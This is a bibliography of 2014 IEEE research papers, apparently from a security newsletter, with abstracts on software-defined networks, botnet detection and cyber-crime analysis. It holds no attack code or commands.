    Keywords: Internet; Internet of Things ;electronic data interchange; multi-agent systems; transport protocols; HTTP; JSON; Web protocols; Web-scale multiagent Internet of Things; data management architecture ;heterogeneous platforms; language independent data formats; multiagent Web; multiagent architecture; network of networks; Cloud computing; Computer architecture ;Databases; Internet of Things; Protocols; Security; Sensors (ID#:14-2050)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6847432&isnumber=6847317
  • Gelenbe, E., "A Software Defined Self-Aware Network: The Cognitive Packet Network," Network Cloud Computing and Applications (NCCA), 2014 IEEE 3rd Symposium on , vol., no., pp.9,14, 5-7 Feb. 2014. This article is a summary description of the Cognitive Packet Network (CPN) which is an example both of a completely software defined network (SDN) and of a self-aware computer network (SAN) which has been completely implemented and used in numerous experiments. CPN is able to observe its own internal performance as well as the interfaces of the external systems that it interacts with, in order to modify its behaviour so as to adaptively achieve objectives, such as discovering services for its users, improving their Quality of Service (QoS), reduce its own energy consumption, compensate for components which fail or malfunction, detect and react to intrusions, and defend itself against attacks.
    Keywords: cognitive radio; quality of service; software radio; telecommunication computing; telecommunication security; CPN; QoS; SAN; SDN; cognitive packet network; quality of service; self-aware computer network; software defined self-aware network; Delays; Energy consumption; Quality of service; Security; Software; Storage area networks; QoS; autonomic communications; energy savings; measurement based goal driven behaviour; network security; self-aware networks; software defined networks (ID#:14-2051)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6786756&isnumber=6786745
  • Kuklinski, S., "Programmable Management Framework For Evolved SDN," Network Operations and Management Symposium (NOMS), 2014 IEEE, vol., no., pp.1,8, 5-9 May 2014. In the paper a programmable management framework for SDN networks is presented. The concept is in-line with SDN philosophy - it can be programmed from scratch. The implemented management functions can be case dependent. The concept introduces a new node in the SDN architecture, namely the SDN manager. In compliance with the latest trends in network management the approach allows for embedded management of all network nodes and gradual implementation of management functions providing their code lifecycle management as well as the ability to on-the-fly code update. The described concept is a bottom-up approach, which key element is distributed execution environment (PDEE) that is based on well-established technologies like OSGI and FIPA. The described management idea has strong impact on the evolution of the SDN architecture, because the proposed distributed execution environment is a generic one, therefore it can be used not only for the management, but also for distributing of control or application functions.
    Keywords: codes; software radio; telecommunication network management; FIPA; OSGI; PDEE; SDN architecture; SDN manager; SDN networks; SDN philosophy; bottom-up approach; code lifecycle management; distributed execution environment; evolved SDN; management functions; network management; on-the-fly code update; programmable management framework; software-defined networking; Computer architecture; Control systems; Hardware; IP networks; Protocols; Security; Software; FIPA; OSGi; SDN; autonomic network management; network management (ID#:14-2052)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838410&isnumber=6838210
  • Ravindran, K.; Rabby, M.; Adiththan, A, "Model-based Control Of Device Replication For Trusted Data Collection," Modeling and Simulation of Cyber-Physical Energy Systems (MSCPES), 2014 Workshop on , vol., no., pp.1,6, 14-14 April 2014. Voting among replicated data collection devices is a means to achieve dependable data delivery to the end-user in a hostile environment. Failures may occur during the data collection process: such as data corruptions by malicious devices and security/bandwidth attacks on data paths. For a voting system, how often a correct data is delivered to the user in a timely manner and with low overhead depicts the QoS. Prior works have focused on algorithm correctness issues and performance engineering of the voting protocol mechanisms. In this paper, we study the methods for autonomic management of device replication in the voting system to deal with situations where the available network bandwidth fluctuates, the fault parameters change unpredictably, and the devices have battery energy constraints. We treat the voting system as a `black-box' with programmable I/O behaviors. A management module exercises a macroscopic control of the voting box with situational inputs: such as application priorities, network resources, battery energy, and external threat levels.
    Keywords: quality of service ;security of data; trusted computing ;QoS; algorithm correctness; bandwidth attack; black-box; data corruptions; device replication autonomic management; malicious devices; security attack ;trusted data collection; voting protocol mechanisms; Bandwidth; Batteries; Data collection; Delays; Frequency modulation; Protocols; Quality of service; Adaptive Fault-tolerance; Attacker Modeling; Hierarchical Control; Sensor Replication; Situational Assessment (ID#:14-2053)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6842399&isnumber=6842390
  • Hamze, M.; Mbarek, N.; Togni, O., "Self-establishing a Service Level Agreement Within Autonomic Cloud Networking Environment," Network Operations and Management Symposium (NOMS), 2014 IEEE , vol., no., pp.1,4, 5-9 May 2014. Today, cloud networking which is the ability to connect the user with his cloud services and to interconnect these services within an inter-cloud approach, is one of the recent research areas in the cloud computing research communities. The main drawback of cloud networking consists in the lack of Quality of Service (QoS) guarantee and management in conformance with a corresponding Service Level Agreement (SLA). Several research works have been proposed for the SLA establishing in cloud computing, but not in cloud networking. In this paper, we propose an architecture for self-establishing an end-to-end service level agreement between a Cloud Service User (CSU) and a Cloud Service Provider (CSP) in a cloud networking environment. We focus on QoS parameters for NaaS and IaaS services. The architecture ensures a self-establishing of the proposed SLA using autonomic cloud managers.
    Keywords: cloud computing; contracts; quality of service; CSP; IaaS services; NaaS services; QoS; Quality of Service; SLA; autonomic cloud managers; autonomic cloud networking environment; cloud computing research communities; cloud service provider; cloud service user; service level agreement; Availability; Bandwidth; Cloud computing; Computer architecture; Quality of service; Security (ID#:14-2054)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838336&isnumber=6838210

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Botnets

Botnets



Botnets, a common security threat, are used for a variety of attacks: spam, distributed denial of service (DDOS), ad and spyware, scareware and brute forcing services. Their reach and the challenge of detecting and neutralizing them is compounded in the cloud and on mobile networks. Research presented in the first half of 2014 shows several approaches to meeting the challenge botnets pose.

  • Lu, Zhuo; Wang, Wenye; Wang, Cliff, "How Can Botnets Cause Storms? Understanding the Evolution And Impact Of Mobile Botnets," INFOCOM, 2014 Proceedings IEEE, vol., no., pp.1501,1509, April 27, 2014-May 2, 2014. A botnet in mobile networks is a collection of compromised nodes due to mobile malware, which are able to perform coordinated attacks. Different from Internet botnets, mobile botnets do not need to propagate using centralized infrastructures, but can keep compromising vulnerable nodes in close proximity and evolving organically via data forwarding. Such a distributed mechanism relies heavily on node mobility as well as wireless links, therefore breaks down the underlying premise in existing epidemic modeling for Internet botnets. In this paper, we adopt a stochastic approach to study the evolution and impact of mobile botnets. We find that node mobility can be a trigger to botnet propagation storms: the average size (i.e., number of compromised nodes) of a botnet increases quadratically over time if the mobility range that each node can reach exceeds a threshold; otherwise, the botnet can only contaminate a limited number of nodes with average size always bounded above. This also reveals that mobile botnets can propagate at the fastest rate of quadratic growth in size, which is substantially slower than the exponential growth of Internet botnets. To measure the denial-of-service impact of a mobile botnet, we define a new metric, called last chipper time, which is the last time that service requests, even partially, can still be processed on time as the botnet keeps propagating and launching attacks. The last chipper time is identified to decrease at most on the order of 1/B, where B is the network bandwidth. This result reveals that although increasing network bandwidth can help with mobile services; at the same time, it can indeed escalate the risk for services being disrupted by mobile botnets.
    Keywords: Internet; Malware; Mobile computing; Mobile nodes; Peer-to-peer computing (ID#:14-2055)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6848085&isnumber=6847911
  • Arora, D.; Verigin, A; Godkin, T.; Neville, S.W., "Statistical Assessment of Sybil-Placement Strategies within DHT-Structured Peer-to-Peer Botnets," Advanced Information Networking and Applications (AINA), 2014 IEEE 28th International Conference on , vol., no., pp.821,828, 13-16 May 2014. Botnets are a well recognized global cyber-security threat as they enable attack communities to command large collections of compromised computers (bots) on-demand. Peer to-peer (P2P) distributed hash tables (DHT) have become particularly attractive botnet command and control (C & C) solutions due to the high level resiliency gained via the diffused random graph overlays they produce. The injection of Sybils, computers pretending to be valid bots, remains a key defensive strategy against DHT-structured P2P botnets. This research uses packet level network simulations to explore the relative merits of random, informed, and partially informed Sybil placement strategies. It is shown that random placements perform nearly as effectively as the tested more informed strategies, which require higher levels of inter-defender co-ordination. Moreover, it is shown that aspects of the DHT-structured P2P botnets behave as statistically nonergodic processes, when viewed from the perspective of stochastic processes. This suggests that although optimal Sybil placement strategies appear to exist they would need carefully tuning to each specific P2P botnet instance.
    Keywords: command and control systems; computer network security; invasive software; peer-to-peer computing; statistical analysis; stochastic processes; C&C solutions; DHT-structured P2P botnets; DHT-structured peer-to-peer botnets; Sybil placement strategy statistical assessment; botnet command and control solution; compromised computer on-demand collections; cyber security threat; diffused random graph; interdefender coordination; packet level network simulation; peer-to-peer distributed hash tables; stochastic process; Computational modeling; Computers; Internet; Network topology; Peer-to-peer computing; Routing; Topology (ID#:14-2056)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838749&isnumber=6838626
  • Derhab, A; Bouras, A; Bin Muhaya, F.; Khan, M.K.; Yang Xiang, "Spam Trapping System: Novel security framework to fight against spam botnets," Telecommunications (ICT), 2014 21st International Conference on , vol., no., pp.467,471, 4-7 May 2014. In this paper, we inspire from two analogies: the warfare kill zone and the airport check-in system, to tackle the issue of spam botnet detection. We add a new line of defense to the defense-in-depth model called the third line. This line is represented by a security framework, named the Spam Trapping System (STS) and adopts the prevent-then-detect approach to fight against spam botnets. The framework exploits the application sandboxing principle to prevent the spam from going out of the host and detect the corresponding malware bot. We show that the proposed framework can ensure better security against malware bots. In addition, an analytical study demonstrates that the framework offers optimal performance in terms of detection time and computational cost in comparison to intrusion detection systems based on static and dynamic analysis.
    Keywords: invasive software; program diagnostics; unsolicited e-mail; STS; airport check-in system; computational cost; defense-in-depth model; dynamic analysis; intrusion detection system; malware bot; prevent-then-detect approach; sandboxing principle; security framework; spam botnet detection; spam botnets; spam trapping system ;static an analysis; warfare kill zone; Airports; Charge carrier processes; Cryptography; Malware; Unsolicited electronic mail (ID#:14-2057)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845160&isnumber=6845063
  • Rrushi, Julian L., "A Steganographic Approach to Localizing Botmasters," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on , vol., no., pp.852,859, 13-16 May 2014. Law enforcement employs an investigative approach based on marked money bills to track illegal drug dealers. In this paper we discuss research that aims at providing law enforcement with the cyber counterpart of that approach in order to track perpetrators that operate botnets. We have devised a novel steganographic approach that generates a watermark hidden within a honey token, i.e. A decoy Word document. The covert bits that comprise the watermark are carried via secret interpretation of object properties in the honey token. The encoding and decoding of object properties into covert bits follow a scheme based on bijective functions generated via a chaotic logistic map. The watermark is retrievable via a secret cryptographic key, which is generated and held by law enforcement. The honey token is leaked to a botmaster via a honey net. In the paper, we elaborate on possible means by which law enforcement can track the leaked honey token to the IP address of a botmaster's machine.
    Keywords: botnets; computer security; steganography (ID#:14-2058)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844746&isnumber=6844560
  • Stevanovic, M.; Pedersen, J.M., "An efficient flow-based botnet detection using supervised machine learning," Computing, Networking and Communications (ICNC), 2014 International Conference on , vol., no., pp.797,801, 3-6 Feb. 2014. Botnet detection represents one of the most crucial prerequisites of successful botnet neutralization. This paper explores how accurate and timely detection can be achieved by using supervised machine learning as the tool of inferring about malicious botnet traffic. In order to do so, the paper introduces a novel flow-based detection system that relies on supervised machine learning for identifying botnet network traffic. For use in the system we consider eight highly regarded machine learning algorithms, indicating the best performing one. Furthermore, the paper evaluates how much traffic needs to be observed per flow in order to capture the patterns of malicious traffic. The proposed system has been tested through the series of experiments using traffic traces originating from two well-known P2P botnets and diverse non-malicious applications. The results of experiments indicate that the system is able to accurately and timely detect botnet traffic using purely flow-based traffic analysis and supervised machine learning. Additionally, the results show that in order to achieve accurate detection traffic flows need to be monitored for only a limited time period and number of packets per flow. This indicates a strong potential of using the proposed approach within a future on-line detection framework.
    Keywords: computer network security ;invasive software; learning (artificial intelligence); peer-to-peer computing; telecommunication traffic; P2P botnets; botnet neutralization; flow-based botnet detection; flow-based traffic analysis; malicious botnet network traffic identification; nonmalicious applications; packet flow; supervised machine learning; Accuracy; Bayes methods; Feature extraction; Protocols; Support vector machines; Training; Vegetation; Botnet; Botnet detection; Machine learning; Traffic analysis; Traffic classification (ID#:14-2059)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6785439&isnumber=6785290
  • Dainotti, A; King, A; Claffy, K.; Papale, F.; Pescape, A, "Analysis of a "/0" Stealth Scan From a Botnet," Networking, IEEE/ACM Transactions on, vol. PP, no.99, pp.1, 1, January 2014. Botnets are the most common vehicle of cyber-criminal activity. They are used for spamming, phishing, denial-of-service attacks, brute-force cracking, stealing private information, and cyber warfare. Botnets carry out network scans for several reasons, including searching for vulnerable machines to infect and recruit into the botnet, probing networks for enumeration or penetration, etc. We present the measurement and analysis of a horizontal scan of the entire IPv4 address space conducted by the Sality botnet in February 2011. This 12-day scan originated from approximately 3 million distinct IP addresses and used a heavily coordinated and unusually covert scanning strategy to try to discover and compromise VoIP-related (SIP server) infrastructure. We observed this event through the UCSD Network Telescope, a /8 darknet continuously receiving large amounts of unsolicited traffic, and we correlate this traffic data with other public sources of data to validate our inferences. Sality is one of the largest botnets ever identified by researchers. Its behavior represents ominous advances in the evolution of modern malware: the use of more sophisticated stealth scanning strategies by millions of coordinated bots, targeting critical voice communications infrastructure. This paper offers a detailed dissection of the botnet's scanning behavior, including general methods to correlate, visualize, and extrapolate botnet behavior across the global Internet.
    Keywords: Animation; Geology; IP networks; Internet; Ports (Computers);Servers; Telescopes; Botnet; Internet background radiation; Internet telephony; Network Telescope; VoIP; communication system security; darknet; network probing; scanning (ID#:14-2060)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6717049&isnumber=4359146
  • Alomari, E.; Manickam, S.; Gupta, B.B.; Singh, P.; Anbar, M., "Design, Deployment And Use Of HTTP-Based Botnet (HBB) Testbed," Advanced Communication Technology (ICACT), 2014 16th International Conference on, vol., no., pp.1265,1269, 16-19 Feb. 2014. Botnet is one of the most widespread and serious malware which occur frequently in today's cyber attacks. A botnet is a group of Internet-connected computer programs communicating with other similar programs in order to perform various attacks. HTTP-based botnet is most dangerous botnet among all the different botnets available today. In botnets detection, in particularly, behavioural-based approaches suffer from the unavailability of the benchmark datasets and this lead to lack of precise results evaluation of botnet detection systems, comparison, and deployment which originates from the deficiency of adequate datasets. Most of the datasets in the botnet field are from local environment and cannot be used in the large scale due to privacy problems and do not reflect common trends, and also lack some statistical features. To the best of our knowledge, there is not any benchmark dataset available which is infected by HTTP-based botnet (HBB) for performing Distributed Denial of Service (DDoS) attacks against Web servers by using HTTP-GET flooding method. In addition, there is no Web access log infected by botnet is available for researchers. Therefore, in this paper, a complete test-bed will be illustrated in order to implement a real time HTTP-based botnet for performing variety of DDoS attacks against Web servers by using HTTP-GET flooding method. In addition to this, Web access log with http bot traces are also generated. These real time datasets and Web access logs can be useful to study the behaviour of HTTP-based botnet as well as to evaluate different solutions proposed to detect HTTP-based botnet by various researchers.
    Keywords: invasive software; DDoS attacks; HBB testbed; HTTP-GET flooding method; Internet-connected computer programs; Web access log; Web servers; behavioural-based approaches; botnet detection systems; cyber attacks; distributed denial of service attacks; http bot traces; malware; real time HTTP-based botnet; Computer crime; Floods; Intrusion detection; Web servers; Botnet; Cyber attacks; DDoS attacks; HTTP flooding; HTTP-based botnet (ID#:14-2061)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779162&isnumber=6778899
  • Haddadi, Fariba; Morgan, Jillian; Filho, Eduardo Gomes; Zincir-Heywood, ANur, "Botnet Behaviour Analysis Using IP Flows: With HTTP Filters Using Classifiers," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on , vol., no., pp.7,12, 13-16 May 2014. Botnets are one of the most destructive threats against the cyber security. Recently, HTTP protocol is frequently utilized by botnets as the Command and Communication (C&C) protocol. In this work, we aim to detect HTTP based botnet activity based on botnet behaviour analysis via machine learning approach. To achieve this, we employ flow-based network traffic utilizing Net Flow (via Soft flowd). The proposed botnet analysis system is implemented by employing two different machine learning algorithms, C4.5 and Naive Bayes. Our results show that C4.5 learning algorithm based classifier obtained very promising performance on detecting HTTP based botnet activity.
    Keywords: botnet detection; machine learning based analysis ;traffic IP-flow analysis (ID#:14-2062)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844605&isnumber=6844560
  • Badis, Hammi; Doyen, Guillaume; Khatoun, Rida, "Understanding botclouds from a system perspective: A principal component analysis," Network Operations and Management Symposium (NOMS), 2014 IEEE , vol., no., pp.1,9, 5-9 May 2014. Cloud computing is gaining ground and becoming one of the fast growing segments of the IT industry. However, if its numerous advantages are mainly used to support a legitimate activity, it is now exploited for a use it was not meant for: malicious users leverage its power and fast provisioning to turn it into an attack support. Botnets supporting DDoS attacks are among the greatest beneficiaries of this malicious use since they can be setup on demand and at very large scale without requiring a long dissemination phase nor an expensive deployment costs. For cloud service providers, preventing their infrastructure from being turned into an Attack as a Service delivery model is very challenging since it requires detecting threats at the source, in a highly dynamic and heterogeneous environment. In this paper, we present the result of an experiment campaign we performed in order to understand the operational behavior of a botcloud used for a DDoS attack. The originality of our work resides in the consideration of system metrics that, while never considered for state-of-the-art botnets detection, can be leveraged in the context of a cloud to enable a source based detection. Our study considers both attacks based on TCP-flood and UDP-storm and for each of them, we provide statistical results based on a principal component analysis, that highlight the recognizable behavior of a botcloud as compared to other legitimate workloads.
    Keywords: Cloud computing; Computer crime; Context; Correlation; Measurement; Principal component analysis; Storms (ID#:14-2063)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838310&isnumber=6838210
  • Hammi, Badis; Khatoun, Rida; Doyen, Guillaume, "A Factorial Space for a System-Based Detection of Botcloud Activity," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on , vol., no., pp.1,5, March 30, 2014-April 2, 2014. Today, beyond a legitimate usage, the numerous advantages of cloud computing are exploited by attackers, and Botnets supporting DDoS attacks are among the greatest beneficiaries of this malicious use. Such a phenomena is a major issue since it strongly increases the power of distributed massive attacks while involving the responsibility of cloud service providers that do not own appropriate solutions. In this paper, we present an original approach that enables a source-based de- tection of UDP-flood DDoS attacks based on a distributed system behavior analysis. Based on a principal component analysis, our contribution consists in: (1) defining the involvement of system metrics in a botcoud's behavior, (2) showing the invariability of the factorial space that defines a botcloud activity and (3) among several legitimate activities, using this factorial space to enable a botcloud detection.
    Keywords: (not provided) (ID#:14-2064)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6813996&isnumber=6813963
  • Sayed, Bassam; Traore, Issa, "Protection against Web 2.0 Client-Side Web Attacks Using Information Flow Control," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on , vol., no., pp.261,268, 13-16 May 2014. The dynamic nature of the Web 2.0 and the heavy obfuscation of web-based attacks complicate the job of the traditional protection systems such as Firewalls, Anti-virus solutions, and IDS systems. It has been witnessed that using ready-made toolkits, cyber-criminals can launch sophisticated attacks such as cross-site scripting (XSS), cross-site request forgery (CSRF) and botnets to name a few. In recent years, cyber-criminals have targeted legitimate websites and social networks to inject malicious scripts that compromise the security of the visitors of such websites. This involves performing actions using the victim browser without his/her permission. This poses the need to develop effective mechanisms for protecting against Web 2.0 attacks that mainly target the end-user. In this paper, we address the above challenges from information flow control perspective by developing a framework that restricts the flow of information on the client-side to legitimate channels. The proposed model tracks sensitive information flow and prevents information leakage from happening. The proposed model when applied to the context of client-side web-based attacks is expected to provide a more secure browsing environment for the end-user.
    Keywords: AJAX; Client-side web attacks; Information Flow Control; Web 2.0 (ID#:14-2065)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844648&isnumber=6844560
  • Wei Peng; Feng Li; Xukai Zou; Jie Wu, "Behavioral Malware Detection in Delay Tolerant Networks," Parallel and Distributed Systems, IEEE Transactions on , vol.25, no.1, pp.53,63, Jan. 2014. The delay-tolerant-network (DTN) model is becoming a viable communication alternative to the traditional infrastructural model for modern mobile consumer electronics equipped with short-range communication technologies such as Bluetooth, NFC, and Wi-Fi Direct. Proximity malware is a class of malware that exploits the opportunistic contacts and distributed nature of DTNs for propagation. Behavioral characterization of malware is an effective alternative to pattern matching in detecting malware, especially when dealing with polymorphic or obfuscated malware. In this paper, we first propose a general behavioral characterization of proximity malware which based on naive Bayesian model, which has been successfully applied in non-DTN settings such as filtering email spams and detecting botnets. We identify two unique challenges for extending Bayesian malware detection to DTNs ("insufficient evidence versus evidence collection risk" and "filtering false evidence sequentially and distributedly"), and propose a simple yet effective method, look ahead, to address the challenges. Furthermore, we propose two extensions to look ahead, dogmatic filtering, and adaptive look ahead, to address the challenge of "malicious nodes sharing false evidence." Real mobile network traces are used to verify the effectiveness of the proposed methods.
    Keywords: Bayes methods delay tolerant networks; filtering theory; invasive software; mobile radio; Bayesian malware detection; DTN model; adaptive look ahead; behavioral characterization; delay-tolerant-network model; dogmatic filtering; modern mobile consumer electronics; naive Bayesian model; obfuscated malware; polymorphic malware; proximity malware; short-range communication technologies; Aging; Bayesian methods; Bluetooth; Equations; Malware; Mathematical model; Silicon; Bayesian filtering; Delay-tolerant networks; behavioral malware characterization; proximity malware (ID#:14-2067)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6463391&isnumber=6674937
  • Carter, K.; Idika, N.; Streilein, W., "Probabilistic Threat Propagation for Network Security," Information Forensics and Security, IEEE Transactions on, vol. PP, no.99, pp.1,1, July 2014. Techniques for network security analysis have historically focused on the actions of the network hosts. Outside of forensic analysis, little has been done to detect or predict malicious or infected nodes strictly based on their association with other known malicious nodes. This methodology is highly prevalent in the graph analytics world, however, and is referred to as community detection. In this paper, we present a method for detecting malicious and infected nodes on both monitored networks and the external Internet. We leverage prior community detection and graphical modeling work by propagating threat probabilities across network nodes, given an initial set of known malicious nodes. We enhance prior work by employing constraints that remove the adverse effect of cyclic propagation that is a byproduct of current methods. We demonstrate the effectiveness of Probabilistic Threat Propagation on the tasks of detecting botnets and malicious web destinations.
    Keywords: Communication networks; Communities; Peer-to-peer computing; Probabilistic logic; Probability; Security; Upper bound (ID#:14-2068)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6847231&isnumber=4358835
  • Janbeglou, Maziar; Naderi, Habib; Brownlee, Nevil, "Effectiveness of DNS-Based Security Approaches in Large-Scale Networks," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on , vol., no., pp.524,529, 13-16 May 2014. The Domain Name System (DNS) is widely seen as a vital protocol of the modern Internet. For example, popular services like load balancers and Content Delivery Networks heavily rely on DNS. Because of its important role, DNS is also a desirable target for malicious activities such as spamming, phishing, and botnets. To protect networks against these attacks, a number of DNS-based security approaches have been proposed. The key insight of our study is to measure the effectiveness of security approaches that rely on DNS in large-scale networks. For this purpose, we answer the following questions, How often is DNS used? Are most of the Internet flows established after contacting DNS? In this study, we collected data from the University of Auckland campus network with more than 33,000 Internet users and processed it to find out how DNS is being used. Moreover, we studied the flows that were established with and without contacting DNS. Our results show that less than 5 percent of the observed flows use DNS. Therefore, we argue that those security approaches that solely depend on DNS are not sufficient to protect large-scale networks.
    Keywords: DNS; large-scale network; network measurement; passive monitoring; statistical analysis (ID#:14-2069)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844690&isnumber=6844560

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Cyber-crime Analysis

Cyber-crime Analysis



As cyber-crime grows, methods for preventing, detecting, and responding are growing as well. Research is examining new faster more automated methods for dealing with cyber-crime both from a technical and a behavioral standpoint. The articles cited here examine a number of facts of the problem and were published in the first half of 2014.

  • Khobragade, P.K.; Malik, L.G., "Data Generation and Analysis for Digital Forensic Application Using Data Mining," Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on , vol., no., pp.458,462, 7-9 April 2014. In the cyber crime huge log data, transactional data occurs which tends to plenty of data for storage and analyze them. It is difficult for forensic investigators to play plenty of time to find out clue and analyze those data. In network forensic analysis involves network traces and detection of attacks. The trace involves an Intrusion Detection System and firewall logs, logs generated by network services and applications, packet captures by sniffers. In network lots of data is generated in every event of action, so it is difficult for forensic investigators to find out clue and analyzing those data. In network forensics is deals with analysis, monitoring, capturing, recording, and analysis of network traffic for detecting intrusions and investigating them. This paper focuses on data collection from the cyber system and web browser. The FTK 4.0 is discussing for memory forensic analysis and remote system forensic which is to be used as evidence for aiding investigation.
    Keywords: computer crime; data analysis; data mining; digital forensics; firewalls; storage management; FTK 4.0;Web browser; cyber-crime huge log data; cyber system; data analysis; data collection; data generation; data mining; data storage; digital forensic application; firewall logs; intrusion detection system; memory forensic analysis; network attack detection; network forensic analysis; network traces; network traffic; packet captures; remote system forensic; transactional data; Computers; Data mining; Data visualization; Databases; Digital forensics; Security; Clustering; Data Collection; Digital forensic tool; Log Data collection (ID#:14-2070)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821438&isnumber=6821334
  • Harsch, A; Idler, S.; Thurner, S., "Assuming a State of Compromise: A Best Practise Approach for SMEs on Incident Response Management," IT Security Incident Management & IT Forensics (IMF), 2014 Eighth International Conference on , vol., no., pp.76,84, 12-14 May 2014. Up-to-date studies and surveys regarding IT security show, that companies of every size and branch nowadays are faced with the growing risk of cyber crime. Many tools, standards and best practices are in place to support enterprise IT security experts in dealing with the upcoming risks, whereas meanwhile especially small and medium sized enterprises(SMEs) feel helpless struggling with the growing threats. This article describes an approach, how SMEs can attain high quality assurance whether they are a victim of cyber crime, what kind of damage resulted from a certain attack and in what way remediation can be done. The focus on all steps of the analysis lies in the economic feasibility and the typical environment of SMEs.
    Keywords: computer crime; small-to-medium enterprises; SME; best practices ;cybercrime; economic feasibility; enterprise IT security experts; incident response management; small and medium sized enterprises; Companies; Computer crime; Forensics; Malware; IT Security; Incident Response; SME; cybercrime; remediation (ID#:14-2071)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6824083&isnumber=6824069
  • Mukaddam, A; Elhajj, I; Kayssi, A; Chehab, A, "IP Spoofing Detection Using Modified Hop Count," Advanced Information Networking and Applications (AINA), 2014 IEEE 28th International Conference on , vol., no., pp.512,516, 13-16 May 2014. With the global widespread usage of the Internet, more and more cyber-attacks are being performed. Many of these attacks utilize IP address spoofing. This paper describes IP spoofing attacks and the proposed methods currently available to detect or prevent them. In addition, it presents a statistical analysis of the Hop Count parameter used in our proposed IP spoofing detection algorithm. We propose an algorithm, inspired by the Hop Count Filtering (HCF) technique, that changes the learning phase of HCF to include all the possible available Hop Count values. Compared to the original HCF method and its variants, our proposed method increases the true positive rate by at least 9% and consequently increases the overall accuracy of an intrusion detection system by at least 9%. Our proposed method performs in general better than HCF method and its variants.
    Keywords: IP networks; Internet; computer network security; statistical analysis; HCF learning phase; IP address spoofing utilization; IP spoofing attacks; IP spoofing detection; Internet; hop count filtering technique; modified hop count parameter; statistical analysis; Computer crime; Filtering; IP networks; Internet; Routing protocols; Testing; IP spoofing; hop count; hop count filtering; statistical analysis (ID#:14-2072)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838707&isnumber=6838626
  • Fachkha, C.; Bou-Harb, E.; Debbabi, M., "Fingerprinting Internet DNS Amplification DDoS Activities," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on , vol., no., pp.1,5, March 30 2014-April 2 2014. This work proposes a novel approach to infer and characterize Internet-scale DNS amplification DDoS attacks by leveraging the darknet space. Complementary to the pioneer work on inferring Distributed Denial of Service (DDoS) using darknet, this work shows that we can extract DDoS activities without relying on backscattered analysis. The aim of this work is to extract cyber security intelligence related to DNS Amplification DDoS activities such as detection period, attack duration, intensity, packet size, rate and geo- location in addition to various network-layer and flow-based insights. To achieve this task, the proposed approach exploits certain DDoS parameters to detect the attacks. We empirically evaluate the proposed approach using 720 GB of real darknet data collected from a /13 address space during a recent three months period. Our analysis reveals that the approach was successful in inferring significant DNS amplification DDoS activities including the recent prominent attack that targeted one of the largest anti-spam organizations. Moreover, the analysis disclosed the mechanism of such DNS amplification DDoS attacks. Further, the results uncover high-speed and stealthy attempts that were never previously documented. The case study of the largest DDoS attack in history lead to a better understanding of the nature and scale of this threat and can generate inferences that could contribute in detecting, preventing, assessing, mitigating and even attributing of DNS amplification DDoS activities.
    Keywords: Internet; computer network security; Internet-scale DNS amplification DDoS attacks ;anti-spam organizations; attack duration; backscattered analysis; cyber security intelligence; darknet space; detection period; distributed denial of service; fingerprinting Internet DNS amplification DDoS activities; geolocation; network-layer; packet size; storage capacity 720 Gbit; Computer crime; Grippers; IP networks; Internet; Monitoring; Sensors (ID#:14-2073)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814019&isnumber=6813963
  • Sgouras, K.I; Birda, AD.; Labridis, D.P., "Cyber attack impact on critical Smart Grid infrastructures," Innovative Smart Grid Technologies Conference (ISGT), 2014 IEEE PES , vol., no., pp.1,5, 19-22 Feb. 2014. Electrical Distribution Networks face new challenges by the Smart Grid deployment. The required metering infrastructures add new vulnerabilities that need to be taken into account in order to achieve Smart Grid functionalities without considerable reliability trade-off. In this paper, a qualitative assessment of the cyber attack impact on the Advanced Metering Infrastructure (AMI) is initially attempted. Attack simulations have been conducted on a realistic Grid topology. The simulated network consisted of Smart Meters, routers and utility servers. Finally, the impact of Denial-of-Service and Distributed Denial-of-Service (DoS/DDoS) attacks on distribution system reliability is discussed through a qualitative analysis of reliability indices.
